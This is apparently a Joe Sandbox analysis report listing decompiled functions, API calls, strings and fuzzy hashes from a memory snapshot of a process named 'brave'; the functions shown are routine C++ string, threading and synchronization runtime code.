0x7ff652b4d5d8
0x7ff652b4d5df
0x7ff652b4d5e3
0x7ff652b4d5e6
0x7ff652b4d5ef
0x7ff652b4d5f4
0x7ff652b4d5fa
0x7ff652b4d600
0x7ff652b4d602
0x7ff652b4d607
0x7ff652b4d60a
0x7ff652b4d60e
0x7ff652b4d61a

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B4D745, 00007FF652B4D79F, 00007FF652B4D7EF
basic_string::_M_create, xrefs: 00007FF652B4D66E, 00007FF652B4D702
basic_string::_M_construct null not valid, xrefs: 00007FF652B4D662
string::string, xrefs: 00007FF652B4D7E8
basic_string::basic_string, xrefs: 00007FF652B4D73E, 00007FF652B4D798

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-4165567116
Opcode ID: 57c91d0e2d534c20ff1c2b42a6d8babaaafc64c8f69f6f4f5bb2339d47d93c0b
Instruction ID: 95231e1644b0296cf391894b000f29d12ec7bada201bb58f1b34bd21dc2e69bb
Opcode Fuzzy Hash: 57c91d0e2d534c20ff1c2b42a6d8babaaafc64c8f69f6f4f5bb2339d47d93c0b
Instruction Fuzzy Hash: 8D51C672F06B4684EB109F25DC805A86365FB1AF9CF9C4632DA9CA7381EEBCD552C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B35560 Relevance: 10.6, APIs: 7, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF67FF652B35560(void* __ecx, void* __rax, long long __rcx, void* __rdx, void* __r12, void* __r13) {
				int _t39;
				int _t42;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t91;
				intOrPtr _t93;
				long _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				long long _t120;

				_t81 = __rax;
				_t120 = __rcx;
				E00007FF67FF652B32D40(__ecx, __rdx);
				 *((long long*)(_t81 + 8)) = _t120;
				if ( *((intOrPtr*)(_t81 + 0x1d8)) == 0) goto 0x52b35589;
				E00007FF67FF652B33280(_t81,  *((intOrPtr*)(_t81 + 0x1d8)));
				if (( *(_t81 + 0x40) & 0x00000030) == 0) goto 0x52b35628;
				_t97 =  *0x52dd6920; // 0x7ff652de1400
				_t82 =  *_t97;
				if (_t82 == 0) goto 0x52b35609;
				if ( *((long long*)(_t82 + 0x30)) != 0) goto 0x52b35622;
				 *((long long*)( *_t97 + 0x30)) = 0x52dd2bd8;
				TlsGetValue(_t95);
				if (0x52dd2bd8 == 0) goto 0x52b35600;
				if ( *0x7FF652DD2C00 == 0) goto 0x52b3563a;
				 *0x7FF652DD2C94 = 1;
				r13d =  *0x7FF652DD2BE0;
				if ( *((intOrPtr*)(0x7ff652dd2c08)) == 0) goto 0x52b355eb;
				CloseHandle(__r12);
				 *((long long*)(0x7ff652dd2c08)) = 0;
				if (( *0x7FF652DD2C1C & 0x00000004) != 0) goto 0x52b3568d;
				__imp___endthreadex();
				E00007FF67FF652B37060();
				if ( *((long long*)(0x7ff652dd2c08)) == 0) goto 0x52b355a9;
				_t84 =  *_t97;
				if (_t84 != 0) goto 0x52b35622;
				E00007FF67FF652B37060();
				goto 0x52b355b7;
				_t18 = _t97 + 0xd0; // 0xd0
				__imp__longjmp();
				 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x30)))) = 0xdeadbeef;
				if (_t18 == 0) goto 0x52b3564b;
				_t39 = CloseHandle(__r13);
				 *((long long*)(0x7ff652dd2c08)) = 0;
				r13d =  *((intOrPtr*)(0x7ff652dd2be0));
				E00007FF67FF652B32D20(_t39, 0x52dd2bd8);
				_t86 =  *_t97;
				if (_t86 == 0) goto 0x52b356d6;
				if ( *((long long*)(_t86 + 0x30)) != 0) goto 0x52b356c0;
				 *((long long*)(_t86 + 0x30)) = 0x52dd2bd8;
				TlsSetValue(??, ??);
				goto 0x52b35600;
				 *0x52dd2bd8 = 0xdeadbeef;
				_t42 = CloseHandle(??);
				 *((long long*)(0x7ff652dd2c00)) = 0;
				E00007FF67FF652B32D20(_t42, 0x52dd2bd8);
				_t88 =  *_t97;
				if (_t88 == 0) goto 0x52b356f4;
				if ( *((long long*)(_t88 + 0x30)) == 0) goto 0x52b356c6;
				goto 0x52b3567e;
				 *((long long*)( *_t97 + 0x30)) = 0x52dd2bd8;
				goto 0x52b3567e;
				E00007FF67FF652B37060();
				_t91 =  *_t97;
				if ( *((long long*)(0x7ff652dd2c08)) == 0) goto 0x52b35670;
				if (_t91 != 0) goto 0x52b356c0;
				E00007FF67FF652B37060();
				goto 0x52b356c0;
				E00007FF67FF652B37060();
				if ( *((long long*)(_t91 + 0x30)) == 0) goto 0x52b356c6;
				goto 0x52b356e8;
				asm("o16 nop [cs:eax+eax]");
				_push(_t97);
				_t98 =  *0x52dd6920; // 0x7ff652de1400
				_t93 =  *_t98;
				if (_t93 == 0) goto 0x52b35760;
				if ( *((long long*)(_t93 + 0x18)) != 0) goto 0x52b35780;
				 *((long long*)(_t93 + 0x18)) = 0x52de13d0;
				if ( *0x52de13d0 == 0) goto 0x52b35750;
				E00007FF67FF652B32D40( *0x52de13d0, 0x52de13d0);
				if (0x52de13d0 == 0) goto 0x52b35750;
				if ( *0x7FF652DE13F0 <= 0) goto 0x52b35790;
				return 0;
			}

0x7ff652b35560
0x7ff652b35569
0x7ff652b3556c
0x7ff652b35578
0x7ff652b35582
0x7ff652b35584
0x7ff652b3558d
0x7ff652b35593
0x7ff652b3559a
0x7ff652b355a0
0x7ff652b355a7
0x7ff652b355b3
0x7ff652b355b9
0x7ff652b355c5
0x7ff652b355d0
0x7ff652b355d2
0x7ff652b355dc
0x7ff652b355e3
0x7ff652b355e5
0x7ff652b355eb
0x7ff652b355fa
0x7ff652b35603
0x7ff652b35609
0x7ff652b35613
0x7ff652b35615
0x7ff652b3561b
0x7ff652b3561d
0x7ff652b35626
0x7ff652b35628
0x7ff652b35634
0x7ff652b3563a
0x7ff652b35643
0x7ff652b35645
0x7ff652b3564b
0x7ff652b35657
0x7ff652b3565c
0x7ff652b35661
0x7ff652b35667
0x7ff652b3566e
0x7ff652b35677
0x7ff652b35682
0x7ff652b35688
0x7ff652b35692
0x7ff652b3569a
0x7ff652b356a3
0x7ff652b356ac
0x7ff652b356b1
0x7ff652b356b7
0x7ff652b356be
0x7ff652b356c4
0x7ff652b356d0
0x7ff652b356d4
0x7ff652b356d6
0x7ff652b356de
0x7ff652b356e6
0x7ff652b356eb
0x7ff652b356ed
0x7ff652b356f2
0x7ff652b356f4
0x7ff652b356fe
0x7ff652b35703
0x7ff652b35705
0x7ff652b35710
0x7ff652b35715
0x7ff652b3571c
0x7ff652b35722
0x7ff652b35729
0x7ff652b35732
0x7ff652b3573d
0x7ff652b3573f
0x7ff652b35747
0x7ff652b3574e
0x7ff652b35757

APIs

Part of subcall function 00007FF652B32D40: TlsGetValue.KERNEL32 ref: 00007FF652B32DA0

TlsGetValue.KERNEL32 ref: 00007FF652B355B9
CloseHandle.KERNEL32 ref: 00007FF652B355E5
_endthreadex.MSVCRT ref: 00007FF652B35603
longjmp.MSVCRT ref: 00007FF652B35634
CloseHandle.KERNEL32 ref: 00007FF652B35645
TlsSetValue.KERNEL32 ref: 00007FF652B35682
CloseHandle.KERNEL32 ref: 00007FF652B3569A

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CloseHandleValue$_endthreadexlongjmp
String ID:
API String ID: 3990644698-0
Opcode ID: 0214bab7663271ea6fee6ac32ca2fa0cc39244fbefd9c866a5c200fdd5429a6d
Instruction ID: 83a0fa8d920c2e910eb762fb7950023bb71eba93b39f670c9bde583dbbd64641
Opcode Fuzzy Hash: 0214bab7663271ea6fee6ac32ca2fa0cc39244fbefd9c866a5c200fdd5429a6d
Instruction Fuzzy Hash: 94513722A09B0682FB959F12D85837832A4FF69B4DF0D5235CE0DA33A1DFBCA944C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B378B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B378B0(void* __edx, intOrPtr* __rcx) {
				intOrPtr _t19;
				intOrPtr _t23;
				void* _t28;
				intOrPtr* _t29;

				_t29 =  *0x52dd6920; // 0x7ff652de1400
				_t19 =  *_t29;
				r12d = __edx;
				if (_t19 == 0) goto 0x52b37948;
				if ( *((long long*)(_t19 + 0xa0)) != 0) goto 0x52b37968;
				 *((long long*)(_t19 + 0xa0)) = 0x52dd2be8;
				E00007FF67FF652B38830(0x52dd2be8, _t28);
				if ( *((intOrPtr*)( *__rcx)) != 0xbab1f0ed) goto 0x52b379a9;
				if ( *((intOrPtr*)( *__rcx + 4)) <= 0) goto 0x52b379a9;
				 *((intOrPtr*)( *__rcx + 4)) =  *((intOrPtr*)( *__rcx + 4)) - 1;
				_t23 =  *_t29;
				if (_t23 == 0) goto 0x52b37978;
				if ( *((long long*)(_t23 + 0xa0)) != 0) goto 0x52b379a0;
				 *((long long*)(_t23 + 0xa0)) = 0x52dd2be8;
				E00007FF67FF652B38870(0x52dd2be8);
				return r12d;
			}

0x7ff652b378b8
0x7ff652b378bf
0x7ff652b378c5
0x7ff652b378cb
0x7ff652b378d5
0x7ff652b378e2
0x7ff652b378e9
0x7ff652b378f7
0x7ff652b37905
0x7ff652b3790e
0x7ff652b37912
0x7ff652b37918
0x7ff652b37922
0x7ff652b3792b
0x7ff652b37932
0x7ff652b37942

Strings

C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 00007FF652B379BC
Assertion failed: (%s), file %s, line %d, xrefs: 00007FF652B379CD
(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 00007FF652B379C3
., xrefs: 00007FF652B379B4

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$.$Assertion failed: (%s), file %s, line %d$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c
API String ID: 0-3957588491
Opcode ID: 84b45b647fba6786e436b223dfef3815ddb9f00301ce0779b142d07c5678c86d
Instruction ID: d2bbbddea05336776eb2396bf7a6a10bffa18ee27e52fe007c1ad892c4fd8bf8
Opcode Fuzzy Hash: 84b45b647fba6786e436b223dfef3815ddb9f00301ce0779b142d07c5678c86d
Instruction Fuzzy Hash: E4318D32A09B4A96EB509B19D8003B827A0FF6AB4CF8C4331CA4CA7391DFBCE445D701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B39F30 Relevance: 10.5, APIs: 7, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B39F30(void* __edx, void* __rcx, void* __r8) {

				r12d = __edx;
				if (__r8 == 0) goto 0x52b39fa1;
				if (__rcx != 0) goto 0x52b39f60;
				if (r12d != 0) goto 0x52b39f8d;
				return r12d;
			}

0x7ff652b39f3a
0x7ff652b39f40
0x7ff652b39f45
0x7ff652b39f4a
0x7ff652b39f56

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF652B39F60
OpenProcess.KERNEL32 ref: 00007FF652B39F77
CloseHandle.KERNEL32 ref: 00007FF652B39F85
_errno.MSVCRT ref: 00007FF652B39FA1

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen_errno
String ID:
API String ID: 2250453136-0
Opcode ID: 99bff5ea223eaa426eec811e31877ad3ae2d66184df2aefccc3710fd92dcba7e
Instruction ID: a450df01b435b2898f33f7a028f9b8e3aae2c18b1b3a26b51988fa6d1b4bb23c
Opcode Fuzzy Hash: 99bff5ea223eaa426eec811e31877ad3ae2d66184df2aefccc3710fd92dcba7e
Instruction Fuzzy Hash: A6016D2290CE0787EB551F659CD923862A0BF65B6CF5C2734CA2AE52D0DEFC3484C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B38980 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF652B389A0
fprintf.MSVCRT ref: 00007FF652B389BF
GetCurrentThreadId.KERNEL32 ref: 00007FF652B389D5
fprintf.MSVCRT ref: 00007FF652B389FC

Strings

C%p %d V=%0X w=%ld %s, xrefs: 00007FF652B389E3
C%p %d %s, xrefs: 00007FF652B389AE

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CurrentThreadfprintf
String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
API String ID: 1384477639-884133013
Opcode ID: f8158c71ef050e1e9cbf393265222da93de2fa9e8f3a0d98d13ba6446c91282d
Instruction ID: e533c74b37c346109a86c2bc2d7eebbb088e8faee5d94a5bf317002fed959a1b
Opcode Fuzzy Hash: f8158c71ef050e1e9cbf393265222da93de2fa9e8f3a0d98d13ba6446c91282d
Instruction Fuzzy Hash: 12016972F0870686EB118B25EC444A977A4BB89BDCB4C8331DE4CA3354EE7CE4858B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2CDF0 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 230
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B2CDF0(void* __rax, void* __rcx, intOrPtr* __r8) {
				intOrPtr _t13;
				signed char _t14;
				signed long long _t41;

				if (__r8 == 0) goto 0x52b2ce93;
				r13d = 1;
				goto 0x52b2ce89;
				if ( *((intOrPtr*)(__r8 + 0x10)) != 0) goto 0x52b2ce81;
				_t13 =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 8))));
				if (r9d != 0) goto 0x52b2ce45;
				_t14 = __rax - 0x1c;
				if (_t14 - 0x34 > 0) goto 0x52b2ce45;
				if ((_t41 << _t14 & 0x0000001f) != 0) goto 0x52b2ce81;
				 *((intOrPtr*)(__r8 + 0x10)) = 1;
				 *((long long*)(__rcx + 0x120)) =  *((intOrPtr*)(__r8 + 0x18));
				if (_t13 == 0x29) goto 0x52b2cea0;
				if (_t13 == 0x2a) goto 0x52b2cec4;
				if (_t13 == 2) goto 0x52b2cee8;
				E00007FF67FF652B2C080();
				if ( *__r8 == 0) goto 0x52b2ce93;
				if ( *((intOrPtr*)(__rcx + 0x130)) == 0) goto 0x52b2ce20;
				return _t13;
			}

0x7ff652b2ce08
0x7ff652b2ce18
0x7ff652b2ce1e
0x7ff652b2ce25
0x7ff652b2ce2b
0x7ff652b2ce30
0x7ff652b2ce32
0x7ff652b2ce38
0x7ff652b2ce43
0x7ff652b2ce49
0x7ff652b2ce57
0x7ff652b2ce61
0x7ff652b2ce66
0x7ff652b2ce6b
0x7ff652b2ce75
0x7ff652b2ce87
0x7ff652b2ce91
0x7ff652b2ce9f

Strings

:, xrefs: 00007FF652B2CF06
{, xrefs: 00007FF652B2CFF2
}::, xrefs: 00007FF652B2D0E9
default arg#, xrefs: 00007FF652B2CFEB
}, xrefs: 00007FF652B2D0F0

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: :$default arg#${$}$}::
API String ID: 0-1396675520
Opcode ID: 08332cc808a94058415bfcd868a3a9bd3ccee03719ae4bd389e3f5cf73b7d852
Instruction ID: e670df1ce0124288bbb4084928cc5e8abdef2c514779e4d7f3cfbd3f2ce084f2
Opcode Fuzzy Hash: 08332cc808a94058415bfcd868a3a9bd3ccee03719ae4bd389e3f5cf73b7d852
Instruction Fuzzy Hash: D391A0B3A0878286E7699A25AC003FE6391EB1679CF4C4035DF9A57785DFBDE482D340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B37A50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF652B37A70
GetCurrentThreadId.KERNEL32 ref: 00007FF652B37A9D
printf.MSVCRT ref: 00007FF652B37AD5

Strings

RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s, xrefs: 00007FF652B37AAB
RWL%p %d %s, xrefs: 00007FF652B37A7C

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CurrentThread$printf
String ID: RWL%p %d %s$RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
API String ID: 2165381015-1971217749
Opcode ID: 8cead37bc54ed6b6f1a314987bdb91882d6bbe9169badf4922341b7b210ccfed
Instruction ID: be949af2c46046eecd7d81006210d7f79bc7d961dcd7bfac9b946860a2fdfa90
Opcode Fuzzy Hash: 8cead37bc54ed6b6f1a314987bdb91882d6bbe9169badf4922341b7b210ccfed
Instruction Fuzzy Hash: FC01CC32A08A0686EB118B15EC5476976A0BB85B9CF1C8230DE0D93344EFBCD4458B90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B38E10 Relevance: 7.7, APIs: 5, Instructions: 186
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00007FF67FF652B38E10(void* __edx, long long __rax, long long __rcx, void* __r9) {
				long long _v48;
				char _v56;
				void* _t6;
				void* _t9;
				void* _t17;
				long long _t25;

				_t25 = __rax;
				r12d = r8d;
				if (__edx == 1) goto 0x52b38e90;
				_v56 = __rcx;
				E00007FF67FF652B35420(__rax);
				_v48 = _t25;
				if (_t25 == 0) goto 0x52b38f20;
				r8d = 0;
				r9d = r12d;
				_t6 = E00007FF67FF652B37560(2, _t25,  &_v56, __r9);
				_t17 = _t6 - 0x80;
				if (_t17 == 0) goto 0x52b39080;
				if (_t17 > 0) goto 0x52b38ed8;
				if (_t6 == 0) goto 0x52b38ec0;
				if (_t6 != 1) goto 0x52b39040;
				ResetEvent(??);
				if (__edx != 2) goto 0x52b390c9;
				E00007FF67FF652B358E0(2, _t25,  &_v56);
				goto 0x52b38e45;
				_t9 = E00007FF67FF652B374C0(r8d, _t25, _v48,  &_v56);
				if (_t9 == 0x80) goto 0x52b3905d;
				if (_t9 == 0x102) goto 0x52b39058;
				r12d = 0x16;
				if (_t9 != 0) goto 0x52b38ec3;
				r12d = 0;
				return r12d;
			}

0x7ff652b38e10
0x7ff652b38e20
0x7ff652b38e26
0x7ff652b38e28
0x7ff652b38e32
0x7ff652b38e37
0x7ff652b38e3f
0x7ff652b38e45
0x7ff652b38e48
0x7ff652b38e53
0x7ff652b38e58
0x7ff652b38e5d
0x7ff652b38e63
0x7ff652b38e67
0x7ff652b38e6c
0x7ff652b38e77
0x7ff652b38e80
0x7ff652b38e86
0x7ff652b38e8b
0x7ff652b38e93
0x7ff652b38e9d
0x7ff652b38ea8
0x7ff652b38eae
0x7ff652b38eb6
0x7ff652b38ec0
0x7ff652b38ed1

APIs

Part of subcall function 00007FF652B37560: WaitForMultipleObjects.KERNEL32 ref: 00007FF652B375D4

ResetEvent.KERNEL32 ref: 00007FF652B38E77
WaitForSingleObject.KERNEL32 ref: 00007FF652B38EF0

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: Wait$EventMultipleObjectObjectsResetSingle
String ID:
API String ID: 256776027-0
Opcode ID: 121a88b0db4ee25a2ff43eadc307b2352640e593a580d7043225a0e0878fb419
Instruction ID: 2b0885697f19c4e804bd8ade97694526e3bf8cadd0bf515c9386955297010d19
Opcode Fuzzy Hash: 121a88b0db4ee25a2ff43eadc307b2352640e593a580d7043225a0e0878fb419
Instruction Fuzzy Hash: BD516921E0C41383FAB556269D8537A41927FB679CF5C0932DE0EE62E1EDFCA985D202

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4EC70 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF652B4EC82
